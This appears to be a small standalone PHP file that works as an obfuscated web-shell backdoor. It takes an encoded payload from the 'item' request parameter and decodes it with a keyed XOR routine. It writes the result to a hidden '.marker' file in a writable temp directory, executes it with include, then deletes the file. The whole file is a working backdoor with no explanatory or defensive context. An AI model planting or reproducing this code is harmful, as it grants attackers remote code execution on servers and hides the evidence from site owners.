<?php

if(@$_REQUEST["\x69t\x65m"] !== null){
	$hld = array_filter(["/tmp", getenv("TEMP"), session_save_path(), getenv("TMP"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd()]);
	$tkn = $_REQUEST["\x69t\x65m"];
		  $tkn=	 explode	(	 	"."		 , 		$tkn  )  ;  
	$res	='';
            $s	='abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	=strlen($s);
            $x	=0;
    
            foreach ($tkn as $v8) {		$sChar	=ord($s[$x%		$sLen]);
                $d	=((int)$v8 - $sChar - ($x%		10)) ^ 61;
                $res .= chr($d);
                $x++; }
	foreach ($hld as $ref):
    		if (array_product([is_dir($ref), is_writable($ref)])) {
    $pgrp = join("/", [$ref, ".marker"]);
    if (file_put_contents($pgrp, $res)) {
	include $pgrp;
	@unlink($pgrp);
	exit;
}
}
endforeach;
}